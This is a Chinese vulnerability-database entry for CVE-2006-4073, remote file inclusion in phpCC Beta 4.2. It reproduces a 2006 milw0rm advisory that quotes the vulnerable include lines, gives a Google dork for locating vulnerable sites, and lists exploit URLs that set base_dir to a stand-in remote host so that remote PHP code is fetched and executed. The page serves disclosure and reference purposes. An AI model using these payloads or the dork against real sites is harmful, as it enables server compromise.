Fabian Hainz phpCC 多个PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110758 漏洞类型 输入验证
发布时间 2006-08-07 更新时间 2006-08-14
CVE编号 CVE-2006-4073 CNNVD-ID CNNVD-200608-180
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2134
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200608-180
|漏洞详情
FabianHainzphpCCBeta4.2存在多个PHP远程文件包含漏洞,远程攻击者可借助提交到:(1)login.php,(2)reactivate.php或(3)register.php中的base_dir参数中的URL执行任意PHP代码。
|漏洞EXP
#############################SolpotCrew Community################################
#
#        phpCC - Beta 4.2 (base_dir) Remote File Inclusion 
#
#        Download file : http://www.phpcc.at/download_file1.html
#
#################################################################################
#
#
#       Bug Found By :Solpot a.k.a (k. Hasibuan) (06-08-2006)
#
#       contact: chris_hasibuan@yahoo.com 
# 
#       Website : http://www.solpotcrew.org/adv/solpot-adv-05.txt
#
################################################################################
#
#
#      Greetz: choi , h4ntu , Ibnusina , r4dja , No-profile , begu , madkid
#              robby , Matdhule , setiawan , m3lky , NpR , Fungky , barbarosa
#              home_edition2001 , Rendy , cow_1seng , ^^KaBRuTz , bYu , Lappet
#              Blue|spy , cah|gemblung , Slacky , blind_boy
#              and all member solpotcrew community @ http://solpotcrew.org/forum/
#
#
###############################################################################
Input passed to the "base_dir" is not properly verified 

before being used to include files. This can be exploited to execute 
arbitrary PHP code by including files from local or external resources.

code from login.php

<?php
define('PHPCC', true);
define('SITE', 'login.php');

include($base_dir."includes/common.php");
include($base_dir."includes/header.php");

switch( $_GET['action'] )

code from reactivate.php

define('PHPCC', true);

include($base_dir."includes/config.php");
include($base_dir."includes/constants.php");
include($base_dir."includes/functions.php");
include($base_dir.'includes/sessions.php');

if( $_POST['submit'] == true )

code from register.php

<?php
define('PHPCC', true);
define('SITE', 'register.php');

include( $base_dir . "includes/common.php" );
include( $base_dir . "includes/header.php" );

Google dork : "Powered by phpCC Beta 4.2"

exploit : http://somehost/login.php?base_dir=http://evilcode
          http://somehost/reactivate.php?base_dir=http://evilcode
          http://somehost/register.php?base_dir=http://evilcode

##############################MY LOVE JUST FOR U RIE#########################
######################################E.O.F##################################

# milw0rm.com [2006-08-07]
|参考资料

来源:XF
名称:phpcc-login-file-include(28259)
链接:http://xforce.iss.net/xforce/xfdb/28259
来源:BID
名称:19376
链接:http://www.securityfocus.com/bid/19376
来源:BUGTRAQ
名称:20060806SolpotCrewAdvisory#6-phpCC-Beta4.2(base_dir)RemoteFileInclusion
链接:http://www.securityfocus.com/archive/1/archive/1/442428/100/0/threaded
来源:VUPEN
名称:ADV-2006-3199
链接:http://www.frsirt.com/english/advisories/2006/3199
来源:MILW0RM
名称:2134
链接:http://milw0rm.com/exploits/2134